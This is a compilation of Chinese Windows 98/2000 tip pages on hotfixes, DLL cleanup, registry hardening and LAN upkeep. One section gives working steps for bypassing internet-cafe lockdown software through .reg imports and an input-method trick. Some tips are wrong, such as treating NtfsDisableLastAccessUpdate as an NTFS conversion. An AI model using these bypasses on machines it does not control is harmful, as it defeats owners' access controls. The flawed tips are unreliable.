%PATHTOFIXES%\Q123321_w2k_sp2_x86.exe -z -m
%PATHTOFIXES%\Q123789_w2k_sp2_x86.exe -z -m
%PATHTOFIXES%\qchain.exe
确保将 some_path 替换为修补程序的正确路径。例如，如果将修补程序保存于 C 盘的 Hotfixes 文件夹下，则将“some_path”替换为“c:\hotfixes”。

还可使用 Qchain.exe 的可选参数 logfilename 创建一个文件，其中包含注册表项 Pending Rename Operations 的“安装之前和安装之后”的快照。

注意：
对于包含列于下列注册表项下的二进制文件的修补程序，QChain.exe 不起作用：
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\KnownDLLs
Windows 2000 Service Pack 2 之后的修补程序没有这一问题，因为更新版本的修补程序使用另一方法来确认现有文件以前版本的文件名。

Qchain.exe下载


手工删除多余的DLL文件

《一键清理系统垃圾》

手工删除多余的DLL文件

    众所周知，＊.DLL（动态连接库）文件对Windows 98的正常运行来说是至关重要的，这些文件若发生异常，易导致系统瘫痪。因此，广大用户对动态连接库文件形成了一种“神秘”的感觉，他们从来不主动对DLL文件进行管理，而无用的动态连接库文件过多将导致系统文件膨胀，影响了系统性能及运行速度！因此，采用适当的方法科学地对DLL文件进行管理，删除那些废弃了的动态连接库文件对提高系统运行效率是非常重要的！
    对DLL文件进行管理的关键是要搞清楚哪些DLL文件是系统运行所必需而我们应加以保留的；哪些DLL文件是已经不再使用我们可以将其删除的！具体步骤为：
    1. 单击“开始”按钮，然后选择“运行”命令，打开运行对话框。
    2. 在运行对话框的“打开”栏中输入“REGEDIT”命令，启动Windows 98的注册表编辑器。
    3. 在注册表编辑器左边依次展开HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SharedDLLs分支。其中SharedDLLs即为记录DLL文件调用情况的分支，我们可从其右边的窗口中找到系统对所有动态连接库文件的使用情况。其中“名称”栏显示的为DLL文件的名称及路径、而“数据”栏显示的则是动态连接库文件的使用情况（由一些表现相应文件共享情况的数字所组成）。如数字1就表示该DLL文件被一个应用程序共享、数字2就表示该DLL文件被两个应用程序共享……以此类推。
    4. 记下其中所有“数据”栏为0的DLL文件（0表示该文件没有被其它应用程序共享，也就是说该DLL文件无用）。
    5. 执行“注册表”菜单的“退出”命令，退出注册表编辑器。
    6. 启动资源管理器，找到哪些“数据”栏为0的DLL文件，备份后将它们删除（注意：一定要保留备份以防万一）。
    7. 重新启动Windows 98，若系统提示缺少某个DLL文件，可利用备份将该文件还原到原来的位置上（一般很少会出现这种情况），确保系统安全运行。
    8. 系统正常运行一段时间之后，若无其它异常现象，我们即可将备份的无用DLL文件删除，至此我们就完成了利用注册表数据库清除Windows 98中无用DLL文件的步骤。


输入法顺序调整

《一键清理系统垃圾》

输入法顺序调整

在注册表中
[HKEY_CURRENT_USER\keyboard layout\preload]
位置下就是输入法的顺序
调整后重新启动就OK

或者删除所有输入法，再重新安装
先安装的就在前面

我的电脑是英文和智能ABC顺序注册表为

REGEDIT4

[HKEY_CURRENT_USER\keyboard layout\preload]

[HKEY_CURRENT_USER\keyboard layout\preload\1]
@="00000409"

[HKEY_CURRENT_USER\keyboard layout\preload\2]
@="E0040804"


谁在偷窥我的电脑？

《一键清理系统垃圾》

谁在偷窥我的电脑？

    当你发现硬盘灯突然闪烁不停时，你是否想知道是谁访问了你的电脑？他们又在你的电脑里干什么？让我们一起揭开来访者头上的神秘面纱。
    一、在Windows 98/Me中

    使用Windows 98/Me提供的“网络监视器”可以查看目前谁在使用你的计算机上的资源。可以添加共享文件夹，也可以断开用户与你的计算机或指定的文件的连接。

    安装 打开“控制面板”，选择“添加删除程序→Windows安装程序”标签，在“组件”列表框中选中“系统工具”，单击下面的“详细信息按钮”，然后勾选“网络监视器”复选框，单击“确定”按钮完成安装。安装好的网络监视器快捷方式位于“开始→程序→系统工具”中。

    使用 查看来访者及其访问的资源，有三种方式：

    一是以“按连接”方式查看。按下工具栏上的“显示用户”，“网络监视器”左边会显示所有已连接到你的计算机上的用户、计算机名、打开的文件数以及来访时间等基本信息。在左边选中一个连接，右边即会显示这个连接打开的文件和文件夹（如图）。

    二是“按共享文件夹”方式查看。按下工具栏上的“显示共享的文件夹”按钮，“网络监视器”主界面左边会显示已共享出去的文件夹，选中一个文件夹，右边会显示连接到这个共享文件夹的计算机名及其打开的文件。

    三是以“打开的文件”方式查看。按下工具栏上的“显示共享的文件夹”按钮，即会显示已被来访者打开的文件列表及打开文件者的计算机名。

    阻止恶意用户的访问 当发现来访者正在窥探敏感文件时，可以及时阻止他们的访问，也有三种方法：

    一是直接关闭来访者打开的文件。单击工具栏上的“显示共享的文件夹”，选中欲关闭的文件，单击菜单栏的“管理”，选择“关闭文件”即可。

    二是断开来访者的连接。单击工具栏上的“显示用户”按钮，选中恶意来访者，单击菜单栏的“管理”，选择“断开用户连接”即可。

    三是停止共享或用密码来限制来访者的访问权限。单击工具栏上的“显示共享的文件夹”按钮，选中需管理的文件夹，单击菜单栏的“管理”，选择“停止共享”即可取消该文件夹的共享；若不希望停止共享，又要限制用户的访问，可以选择“共享文件夹的属性”为共享文件添加密码，限制未经授权的用户的访问。需要注意的是，设置好密码后，必需断开已连接用户的连接后，密码方能起作用。

    二、在Windows 2000/XP中

    在Windows 2000/XP中，网络监视器不再监测访问本机的连接及来访者的访问信息，但来访者的一举一动仍在Windows的监视之下。单击“开始→设置→控制面板”，双击“管理工具”，再双击“计算机管理”，在右边的目录树中双击展开“共享文件夹”，下面共有三个选项：“共享”、“会话”和“打开文件”。

    共享：显示当前系统的共享资源，在这里可以创建和设置共享及其权限。

    会话：显示当前来访者的用户名、IP地址、打开的文件数以及来访时间等基本信息。在用户名上单击右键，还可以断开恶意来访者的连接。如果对方也使用Windows 2000/XP系统，还能给对方发送信使消息，通知对方关于自己共享资源的一些情况。

    打开文件：显示所有来访者及其打开的文件，如果你不希望对方浏览你的文件，单击右键，在弹出菜单中可以关闭其中一个或所有打开的文件。


随意改动文件与程序的关联

《一键清理系统垃圾》

随意改动文件与程序的关联

    在Windows中打开一个文件时，系统会自动调用相应的程序来打开它。但有时我们不想用这个程序来打开这个文件，这就得改变文件和程序的关联，《电脑报》上有一些改动关联的方法，但通过修改注册表，也可以找到一个可以随意修改文件和程序关联的方法。
    运行Regedit，在HKEY_CLASSES_ROOT下可以找到两个主键，“＊”和“Unknown”，“＊”主键下内容对应的是所有类型的文件，而“Unknown”主键下的内容则对应着未知类型的文件，即双击未知类型的文件时，弹出“打开方式”对话框，我们要做的就是把“Unknown”下所有的内容源源本本的复制到“＊”主键下。
    展开“Unknown”主键，其下的内容是键值AlwaysShowExt和主键shell，shell主键下是主键openas，openas主键下是主键command，每个主键（command除外）下都有一个默认键值“未设置键值”，command主键下的键值内容为“C:\WINDOWS\rundll32.exe shell32.dll，OpenAs_RunDLL ％1”，将这些内容复制到“＊”主键下，注意大小写和空格不要搞错了，删除“Unknown”主键，退出注册表编辑器，至此，大功告成。
    这时我们用鼠标左键双击某个文件时，系统仍会调用当前关联的程序来打开它，而用右键单击某文件时，会发现在快捷菜单中多了一项“打开方式”，选中它，就可以选择你想使用的程序，如想改变关联，只须在“始终用该程序打开这一类型的文件”复选框中打上钩即可。


提高系统安全的注册表修改秘籍

《一键清理系统垃圾》

提高系统安全的注册表修改秘籍

    现在的电脑给人有一种弱不禁风的感觉，不是今天受到这个病毒突袭，就是明天受到那个黑客的攻击，出错、死机变得象家常便饭一样了。为了让计算机“坚强”起来， 不少人找来了杀毒软件、防火墙，希望通过这些软件来增强计算机的免役力。的确，这些软件在一定程度上增强了计算机抵抗外来攻击的能力，但对于计算机内部系统存在的漏洞就无能为力了。本文的目的主要是向大家介绍一下通过修改注册表的方法，来提高系统的安全。

    一、隐藏一个服务器

    为了保证局域网中服务器上的资源不受其他人的非法访问和攻击，我们从安全的角度考虑，有时需要把局域网中指定的服务器计算机名称隐藏起来，以便让其他局域网用户无法访问到，那么我们该如何实现呢？下面请看该设置的具体步骤：

    1、打开注册表编辑器，并在编辑器对话框中用鼠标依次单击如下分支：HKEY_LOCAL_ MACHINE \ SYSTEM \ CurrentControlSet \Services \ LanmanServer \ Parameters键值。

    2、用鼠标单击该键值下面的Hidden数值名称，如果未发现此名称，那么添加一个，其数据类型为REG_DWORD。

    3、接着用鼠标双击此项，在弹出的“DWORD编辑器”对话框中输入1即可。

    4、最后单击“确定”按钮，并退出注册表编辑窗口，重新启动计算机就可以在局域网中隐藏一个服务器了。

    二、防止其他人非法编辑注册表

    注册表是整个系统的灵魂所在，任何对注册表的错误修改都有可能让系统瘫痪。因此，如果您不是一位系统高手的话，最好不要轻易动手修改注册表。当然在公共场所，为了防止那些电脑“菜鸟”们，随意更改注册表设置，我们最好还是取消其他用户对注册表进行修改的权利。我们可以按照如下步骤来实现这样的目的：

    1、首先在注册表编辑界面中，找到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\键值；

    2、然后在Policies键值的下面新建一个System主键，如果该主键已经存在的话，可以直接进行下一步；

    3、接着在对应System主键右边窗口的空白处再新建一个DWORD串值，并命名为DisableRegistryTools；

    4、把DisableRegistryTools的值设置为1，设置好以后，重新启动计算机就可以达到防止其他人非法编辑注册表的目的了。

    六、隐藏用户登录名

    Win9x以上的操作系统可以对以前用户登录的信息具有记忆功能，下次重新启动计算机时，我们会在用户名栏中发现上次用户的登录名，这个信息可能会被一些非法分子利用，而给用户造成威胁，为此我们有必要隐藏上机用户登录的名字。

    1、在设置时，请用鼠标依次访问键值HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon；

    2、在对应Winlogon键值右边的窗口中，用鼠标右键单击窗口的空白处，从弹出的快捷菜单中选择“新建”/“字符串”命令；

    3、给新建字符串命名为"DontDisplayLastUserName",并把该字符串值设置为"1"；

    4、设置完后，重新启动计算机就可以隐藏上机用户登录的名字了。

    七、不允许用户拨号访问

    如果用户的计算机上面有重要的信息，有可能不允许其他人随便访问。那么如何禁止其他人拨入访问你的计算机，减少安全隐患呢，具体步骤为：

    1、打开注册表编辑器，并在编辑器中依次展开以下键值：

    [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Network]；

    2、在编辑器右边的列表中用鼠标选择“NoDialIn”键值，如果没有该键值，必须新建一个DWORD值，名称设置为“NoDialIn”；

    3、接着用鼠标双击“NoDialIn”键值，编辑器就会弹出一个名为“字符串编辑器”的对话框，在该对话框的文本栏中输入数值“1”，其中0代表禁止拨入访问功能，1代表允许拨入访问功能；

    4、退出后重新登录网络，上述设置就会起作用。

    八、屏蔽对软盘的网络访问

    俗话说“病从口入”，计算机中的病毒有很多都是通过访问不干净的软盘而被感染得来的，如果我们允许用户通过网络来访问软盘的话，那么整个网络都有可能被感染病毒，最终的结果将会使网络中的所有计算机都中毒瘫痪。为了防止病毒入侵整个网络，我们必须严格管理计算机的输入设备，以断绝病毒的源头，为此就要禁止通过网络访问软盘。设置时，您可以按照如下操作步骤来进行：

    1、在系统的运行对话框中输入regedit命令，打开注册表编辑器；

    2、在注册表编辑器操作窗口中，依次打开键值HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon；

    3、在对应Winlogon右边的窗口中，检查一下其中有没有包含键值AllocateFloppies，如果没有，用鼠标右键单击窗口的空白处，从弹出的快捷菜单中选择“新建”/“DWORD值”；

    4、把新建的DWORD值取名为AllocateFloppies，同时把它的值修改为0或1，其中0代表可被域内所有管理员访问，1代表仅可被当地登陆者访问。

    九、禁止访问“文件系统”按钮

    在“系统属性”对话框中，有一个名为“文件系统”的功能按钮，利用它您可以对计算机的硬盘、软盘以及其他移动设备进行相关设置。但为了防止非法用户随意篡改这些设备的设置，您有时需要把“系统属性”中“文件系统”的按钮隐藏起来，下面是具体的设置步骤：

    1、打开注册表编辑器窗口，并在窗口中依次访问如下键支：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System；

    2、在对应System键值的右边窗口中，用鼠标单击窗口的空白处，从弹出的快捷菜单中选择“新建”/“DWORD串值”；

    3、给新建的DWORD串值，取名为“NoFileSysPage”，并把它的值设置为“1”；

    4、设置完后，重新启动计算机就可以使设置生效了。

    十、让“网上邻居”图标隐藏起来

    大家知道，通过网上邻居可以随意访问局域网中其他计算机上的内容，但如果其他计算机没有设置特别的访问权限的话，那些别有用心的破坏者很有可能利用网上邻居来非法删除其他计算机上的重要数据，给其他计算机造成了损失。为了避免这样的损失，我们可以利用注册表来隐藏“网上邻居”。

    1、首先在打开的注册表编辑器操作窗口中，用鼠标依次访问键值HKEY_CURRENT_USER\Software\Microsoft\ Windows\CurrentVersion\Policies\Explorer；

    2、在对应Explorer键值右边的操作窗口中，用鼠标单击窗口的空白处，从弹出的快捷菜单中，用鼠标依次访问“新建”/“DWORD串值”；

    3、给新建的DWORD串值命名为NoNetHood，同时把该值设置为1(十六进制)；

    4、设置好后，重新启动计算机就可以使设置生效了。

    十一、限制使用系统的某些特性

    在网吧或公用场所中，有时为了保证系统的属性不被其他普通用户随意更改，我们就必须要限制使用系统的某些特性。要实现这个目的，我们可以利用修改注册表编辑器的方法来达到。

    1、运行注册表编辑器，进入HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System键值；

    2、如果不存在该键值，就新建一个；

    3、然后将该键值下方的DisableTaskManager的值设为1，表示将阻止用户运行任务管理器。

    4、接着将NoDispAppearancePage设为1，表示将不允许用户在控制面板中改变显示模式；

    5、下面再将NoDispBackgroundPage设为1，表示将不允许用户改变桌面背景和墙纸。

    十二、限制用户使用指定程序

    为防止用户非法运行或者修改程序，导致整个计算机系统处于混乱状态，我们可以通过修改注册表来达到让用户只能使用指定的程序的目的，从而保证系统的安全。

    1、在注册表编辑器窗口中依次打开HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer键值；

    2、在对应Explorer键值右边的窗口中，新建一个DWORD串值，名字取为“RestrictRun”，把它的值设为“1”；

    3、在RestrictRun的主键下分别添加名为“1”、“2”、“3”等字符串值，然后将“1”，“2”、“3”等字符串的值设置为我们允许用户使用的程序名。例如将“1”、“2”、“3”分别设置为word.EXE、notepad.EXE、write.EXE，则用户只能使用word、记事本、写字板了，这样我们的系统将会做到最大的保障，也可以限制用户运行不必要的软件了。

    十三、不允许用户设置屏幕保护密码

    许多电脑使用者在使用电脑时，都有一种独占性，他们不希望自己使用的电脑，再去让别人使用，于是他们常常会在短暂离开电脑时，给电脑设定了屏保密码；但遗憾的是，他们在用完电脑之后，又不能及时把这些屏保密码去除，这样很容易导致其他用户不能正常使用，严重的能使计算机无法启动。为了避免这些现象的发生，我们可以通过修改注册表，来设定用户无权进行屏保密码的设置。

    1、打开注册表编辑器窗口，在该窗口中用鼠标访问CURRENT_USER\ControlPanel\desktop\ScreenSaveUsePassword键支；

    2、在对应ScreenSaveUsePassword键值的右边窗口中，将ScreenSaveUsePassword的值设置为0就可以了。

    十四、将文件系统设置为NTFS格式

    在Windows2000以及NT系统中，用户可以将分区设置为NTFS格式来确保文件系统的安全，当然我们也可以通过修改注册表的方法来达到将文件系统设置为NTFS格式的目的，具体实现步骤如下：

    1、打开注册表编辑器，并在编辑器中依次展开以下键值：

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem；

    2、在注册表编辑器中用鼠标单击“编辑”菜单，并在下拉菜单中选择“新建”菜单项，并在其弹出的子菜单中单击“DWORD值”；

    3、在编辑器右边的列表中输入DWORD值的名称为“NtfsDisableLastAccessUpdate”；

    4、接着用鼠标双击NtfsDisableLastAccessUpdate键值，编辑器就会弹出一个名为“字符串编辑器”的对话框，在该对话框的文本栏中输入数值“1”，其中0代表“取消”该项功能，1代表“启用”该项功能。

    十五、抵御WinNuke黑客程序对计算机的攻击

    WinNuke是一个破坏力极强的程序，该程序能对计算机中的Windows系统进行破坏，从而会导致整个计算机系统瘫痪，所以我们有必要预防WinNuke的破坏性。我们可以在注册表中对其进行设置，以保证系统的安全。

    1、在注册表编辑器操作窗口中，用鼠标依次单击键值HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP；

    2、在对应MSTCP键值的右边窗口中，用鼠标单击窗口的空白处，从弹出的快捷菜单中选择“新建”/“DWORD值”，并给DWORD值取名为“BSDUrgent”，如果该键值已经存在，可以直接进行下一步；

    3、然后将BSDUrgent值设置为0，重新启动计算机后就可以实现目的了。

    十六、恢复对注册表的错误修改

    由于注册表是计算机的核心和灵魂，对注册表进行的任何一个错误修改都有可能使计算机不能正常启动。为了确保万无一失，我们在对注册表进行修改时，都要对注册表进行备份工作，一旦在修改注册表时出了一点小错误，就可将以前备份的注册表文件再导入注册表中，从而恢复注册表以前的内容，下面是具体的操作步骤：

    1、在运行对话框中输入regedit命令，程序将弹出了一个注册表编辑器窗口；

    2、在该窗口中用鼠标单击“注册表”菜单下的“导入注册表文件”，从弹出的文件对话框中找到备份的.reg文件，最后再用鼠标单击该对话框中的“确定”按钮，就可以重新向注册表写入正确信息；

    3、当注册表损坏或错误更改了软硬件设置，导致系统启动失败，并且自动修复无效，用“Scanreg.exe ／Fix”也无法恢复时，可在纯DOS下运行“scanreg.exe ／restory” 进行恢复，有五个数据供选择，先选日期最近的恢复，若仍不行，再依次选择，直到系统正常运行为止。


网吧IP自动修改程序

《一键清理系统垃圾》

网吧IP自动修改程序

    各位网吧业主和网管朋友一定经历过这样的情景。

    就是每次GHOST盘后，都要给每台机器修改IP地址、网络标识、反恐CDKEY等……这是毫无技巧性又十分烦琐的工作，为大家做了个小脚本，希望能给大家派上用场。

    它的功能如下：

    自动更改IP地址、子网掩码、网络标识、系统登陆用户名、绝不重复的反恐CDKEY……

    使用方法：

    1 用winrar 3.0解开AutoIp.rar得到Money.vbs文件

    2 用记事本打开money.vbs输入一些网吧信息。

     Dim GateWay,IpMast,PcName,Money
          GateWay = "192.168.0.254"
          IpMask = "255.255.255.0"
          PcName = "User"

    看到了吗？GateWay是您的网关，IpMask是您的子网掩码，PcName是标识前缀！

    3 以上操作完成后记得保存！

    4 你可以执行这个脚本了。对，就是双击它！

    5 正式使用：比如你的机器是12号，就在程序的文本栏里输入12就行。

    然后程序会问你是否重新启动windows，点"是”就可以了。

    *为了缓解网管的工作负担，我希望大家为这个脚本提供一些建议。

    如果这个程序得到完善，对于大家都是有好处的。


网吧管理十大漏洞嚗光

《一键清理系统垃圾》

网吧管理十大漏洞嚗光

    上网吧的人多了，管理也难了，于是网吧管理软件也来了。网管软件来了，于是网管就轻松了，每天打开电脑，启动软件，仿佛也就没事了。不过真是这样吗?也许只是轻点几下鼠标，就会找到几个漏洞，网管软件也就如玻璃般的碎掉。不信?
    现在网吧的管理员大多使用诸如《美萍》之类的网吧管理软件来管理系统，同时还通过修改系统注册表的方法来禁止用户进行诸如删除文件、修改参数的危险操作。但在没有使用任何工具软件的前提下，以一些简单的方法就轻易突破了网吧管理软件的限制，原本被禁止的系统功能全部复活，不仅可以删除文件，还可以对系统注册表进行随意修改，整个系统可任意使唤。这次，我们将在网吧发现的十大致命漏洞全部曝光，以此警示每一位网吧管理员。

    一、IE菜单漏洞
    找回菜单　---轻松
    微软老大的补丁越打越多，这样，倒不是说比尔大叔的漏洞越来越多了，而是正应了那句“上有政策，下有对策”，网管软件在旧版本中的屏蔽IE中的文件和工具菜单的漏洞有一大箩筐，新版本的漏洞就不那么容易发现了，不过，请看……
    探秘欲望度：★★★★★
    探秘难度：★★★☆☆
    探秘方法：这次我们需要再次用到快捷键，这次轮到“Win+D”了，刷新桌面，在《美萍》下的桌面实际是美萍指定的一个目录，而原桌面则被隐藏了，刷新是对原桌面的刷新，只要你不切换其他窗口，我的电脑等将会一直存在于桌面之上。你要做的是：打开我的电脑，然后再点工具栏中的“向上”，就可以把桌面以窗口的形式打开了（因为硬盘是被屏蔽掉的，当我们打开我的电脑时将什么都看不见），此时你要做的是新建一个文本文档，输入这么几行：　REGEDIT4　[HKEY_CURRENT_USER\Software\Microsoft\Windows\Current　Version\Explorer]　″NoFavoritesMenu″=dword00000000　　　另存为任意文件名后缀为“.reg”的文件就可以了，之后你要做的就是导入它，等你再次开机时打开我的电脑就会看见那可爱的被网管软件屏蔽IE中的文件和工具菜单啦。

    二、本地硬盘漏洞
    给硬盘解锁　---小菜
    上网者最苦大仇深的莫过于不能使用硬盘了，不说那些很伤心的故事了，就说你要下载个什么“小小六号”过过侠客瘾，可你下载的文件放哪儿?下面这招解锁方法就这样出笼了。
    探秘欲望度：★★★★★
    探秘难度：★★★☆☆
    探秘方法：见过报上的寻人启事吗?见过，不就是查找吗?丢的人不一定找得到，硬盘却是绝对可以找回来的。网吧老板们大都因为屏蔽了硬盘而对热键大开绿灯。其原因也是再简单不过的了，因为你在搜索栏内找不到本地硬盘，如果你选择我的电脑来进行“查找”快捷键是用“WIN+F”键啦,如“Command”等的文件时一定会被告知“找不到”。但其实不然，在搜索栏中输入“C:\”回车后，找到的可就是一大堆的东西了。　　这样一来，又可以对本地硬盘进行访问了。当然还有一些人通过操作系统与IE高度结合的漏洞：打开IE浏览器后，在地址栏中直接输入“C:”后按“回车”键也可以察看硬盘中的资源，但这是一种是较古老的方法了。

    这里的关键就是如何访问到本地硬盘，一旦进入了本地硬盘，对于一个熟悉Windows系统的用户来说，一台完整的电脑就在面前了。

    三、程序运行漏洞
    禁止运行　---没门
    用惯电脑的人都知道，在开始菜单里面有一个很重要的程序，那就是运行程序了，有了这个程序我们可以运行我们想用到的其它程序，而进一步实现电脑的操作。但是在网吧上网的时候，当然就没有那么好的事情了，网吧老板们总喜欢安装一些网管软件来阻止我们的使用，唉，真没办法，在这种情况下，我们就只能另找门路啦!于是，绕过马奇诺防线的方法出现了。
    探秘欲望度：★★★☆☆
    探秘难度：★★★☆☆
    其实方法真的很简单哦，在我们所提到的其它漏洞方法中已经提到过了的，当然就是修改注册表了，只是其中的参数不同而已，当然改成运行的那个参数不就行了吗?这里我们用导入的方法进行修改。先打开一个记事本，在上面输入：　　REGEDIT4　[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]　″NoRun″=dword00000000　　　然后保存为“.reg”文件或保存为“.txt”文件后将扩展名改为“.reg”，再执行该文件即可。就这么简单搞定，方便快捷。

    四、资源管理器漏洞
    解放管理器---　有戏
    资源管理器，想必每一个电脑的使用者都应该知道吧，它的作用当然就是让我们更方便地操作电脑里的全部内容，但一些网吧老板却不提供这些方便给我们。不过要想在网吧操作自如，也不是太难!
    探秘欲望度：★★★★☆
    探秘难度：★★★☆☆
    探秘方法：网吧的电脑什么都可以没有，当然就不能没有QQ和IE啦，好的，那我们就从IE下手吧。通过IE查看文件夹，这种方法非常直接有效。首先打开一个IE，拉出“查看”下拉菜单，选择“浏览器”中的“文件夹”选项。　　这时，主窗口左侧出现资源管理器的窗口，内有我的电脑树形目录结构。这时用户可以根据自己的需要一层层地展开，寻找自己所需的东东了。

    五、鼠标右键漏洞
    挡住右键菜单　---没戏
    网页上有那么多漂亮的图片或者自己众里寻他千百度的资料，可兴冲冲地点击右键想把它保存下来，却发现右键根本不能用，你的感觉是不是七窍冒烟啦。也许正是这个原因才让人发现了这个漏洞。
    探秘欲望度：★★★☆☆
    探秘难度：★★☆☆☆
    探秘方法：屏蔽鼠标右键菜单后，不能新建文件。此时网吧里常用《超级兔子》中的“安全限制全选”+“屏蔽本地硬盘”+《美萍》来实现的（网吧中最流行的管理软件一般是《美萍》，本系列如果没有特别说明都是在《美萍》下的操作），但这也是挡不住的!在网页中遇到禁用右键的情况我们有许多办法来解决，其实这些方法中有的也能移植到操作系统中的。就介绍最常用的也最有效的一种方法吧：在需要操作的文件或快捷图标上先点住右键不放，再点下左键，然后松开左键，最后松开右键，这时熟悉的右键菜单便呈现在眼前了。另外还有一招更普通，用鼠标左键单击选中文件，同时按住“Shift+F10”键，即可在资源管理器中显示出鼠标的右键菜单。

    六.下载　漏洞
    突破下载封锁　---不难
    网络诱惑何其多呀，比如精美图片、搞笑程序，哪个不想拉下来到本地的机子里瞅瞅呀，可在网管软件下，下载却不成，不用着急的，接着再看……
    探秘欲望度：★★★★★
    探秘方法：虽然标榜探秘难度为三星级，但只要能利用前面提到的访问硬盘的漏洞以及IE中的文件和工具菜单的漏洞，下面这招就只是水到渠成了。当能访问硬盘以后，通过“C:\windows\start　menu”中的快捷方式，你可以自由地使用系统的“开始”菜单启动下载程序，或者直接进入下载软件目录启动下载程序，这样就可以不怕IE的下载限制而进行下载了。
    如果需要用IE下载时，你只需要点击“工具”→“Internet选项”→“安全”→“默认级别”菜单。然后在需要下载的链接上单击鼠标右键，选择“目标另存为”保存即可。或者选择“安全”→“自定义级别”里选择“下载”，选择“启用”，“确定”后即可。

    七、文件操作漏洞
    删除文件----　简单
    这是一个注重隐私的时代，我的银行卡密码被别人知道了岂不是大大不妙，所以很多时候，在网吧上网，删除自己留在网吧电脑里的私人文件是很重要的，但网吧都安装了管理软件，所以很难进行这样的操作，别急，下面有一种方法让你办到，这样你就不会担心自己的隐私被别人发现啦。
    探秘欲望度：★★★★☆
    探秘难度：★★★☆☆
    探秘方法：利用输入法漏洞，输入法漏洞不是中文Win2000的漏洞吗?没错!就是利用这个方法来打开硬盘进行操作哦。方法很简单：按“Ctrl+Shift”打开微软拼音输入法（如没有用其它输入法也可，方法类似），然后将光标插入会员卡号的文本输入框内，接着开始往里面输入任意一个拼音字母，然后就会出现拼音的状态条，在状态条上点击右键，或用键盘上的属性键，就会出现一个下拉菜单，选择其中的定义词组，就算系统限制右键，在这也不管用，然后选择文件菜单里面的保存，就会调出保存对话框，然后随便选择一个文件夹，点击右键，选择资源管理器，打开，一切就OK啦!现在你就可以删除自己的隐私文件了。如果鼠标被限定在那个锁定窗口内，就用键盘操作。此法百试百灵，而且现在没有防御的方法。

    八、注册表漏洞
    封锁注册表　---很难
    那些喜欢玩电脑的高手，总是希望能过修改注册表来实现一些深层次的应用，希望能如自己在家一样有那种自由冲浪的感觉，此情咱们也是强烈渴望的，那么如何可以突破网管软件的限制，成功修改注册表?　　　　　　　探秘欲望度：★★★★☆
    探秘难度：★★★★☆
    探秘方法：由于网管软件在许多功能上的禁止使用（包括禁止使用注册表编辑器）是通过对注册表的修改来达到目的的，因此我们只要将注册表修改回来，就能取消网关的限制。这里我们用导入的方法进行修改。先打开一个记事本，在上面输入　REGEDIT4　HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System　″DisableRegistryTool″=dword00000000　　　这个与第三个漏洞中所输入的是类似的，同样地保存为“.reg”文件或保存为“.txt”文件后将扩展名改为“.reg”，再双击执行该文件即可。

     九、禁用软件漏洞
     恢复“WinZip”本色　---好办
     唉，想起来也气煞人也，有些网吧连“WinZip”这种压缩工具软件都不能使用，那辛辛苦苦从网上拖个需要解压的程序下来，岂不是又浪费银子又浪费时间。不过话虽如此，网吧也有他们的难处，有些不守规矩的网民就喜欢用点这些软件，来搞搞破坏什么的，用它们来改改注册表什么的，而且是乱改，不像我，改注册表只是为了使“WinZip”能使用，嗯，好的，下面这种方法就是如何通过改注册表来使用“WinZip”。
    探秘欲望度：★★★☆☆
    探秘难度：★★★★☆
    探秘方法：我们这次要做的当然还是利用IE与系统结合的漏洞，在IE地址栏中用中文输入“桌面”回车。
    如此一来我们熟悉的桌面又以窗口的形式打开啦，现在我们要做的和上面要做的一样：新建一个文本文档，然后输入这么一行：　REGEDIT4　HKEY_LOCAL_MACHINE\Software\Mpsoft\Smenu　″unzipped″=dword00000000　　　然后保存为.reg文件或保存为.txt文件后，将扩展名改为.reg，在执行该文件就一切搞定。

    十、定制IE浏览器漏洞
     定制IE浏览器---　随心
     在网吧上网，总喜欢个性一点，比如开启新的IE就会自动连接到自己最喜欢的网站上，或者关掉网页的“声音”和“动画”，让浏览更加流畅。可是这个必须到“工具”栏里“Interner选项”里设置，而这个选项往往是被屏蔽了的。其实把选项变回来也是很简单的。
    探秘欲望度：★★★☆☆
    探秘难度：★★★☆☆
    探秘方法：在前面我们已经能够访问硬盘了，所以此时只需要到系统“System”目录下将名为“Inetcpl”的文件扩展名改为“.cpl”，这时“工具”栏里“Internet选项”便出来了。非常简单哦。这样，我们就可以设置我们喜欢的IE了


网管维护局域网技巧大汇总

《一键清理系统垃圾》

网管维护局域网技巧大汇总

网管是一个局域网的维护者，但是局域网中故障各种各样是不是很头痛呢？今天我总结了一下局域网中经常用的小技巧，希望对广大网管朋友有帮助。

    1、有故障时首先检查网卡

    在局域网中，网络不通的现象是常有发生，一旦遇到类似这样的问题时，我们首先应该认真检查各连入网络的机器中，网卡设置是否正常。检查时，我们可以用鼠标依次打开“控制面板/系统/设备管理/网络适配器”设置窗口，在该窗口中检查一下有无中断号及I/O地址冲突（最好将各台机器的中断设为相同，以便于对比），直到网络适配器的属性中出现“该设备运转正常”，并且在“网上邻居”中至少能找到自己，说明网卡的配置没有问题。

    2、确认网线和网络设备工作正常

   当我们检查网卡没有问题时，此时我们可以通过网上邻居来看看网络中的其他计算机，如果还不能看到网络中的其他机器，这种情况说明可能是由于网络连线中断的问题。网络连线故障通常包括网络线内部断裂、双绞线、RJ－45水晶头接触不良，或者是网络连接设备本身质量有问题，或是连接有问题。这时，我们可以使用测线仪来检测一下线路是否断裂，然后用替代的方法来测试一下网络设备的质量是否有问题。在网线和网卡本身都没有问题的情况下，我们再看一看是不是软件设置方面的原因，例如如果中断号不正确也有可能导致故障出现。

    3、检查驱动程序是否完好

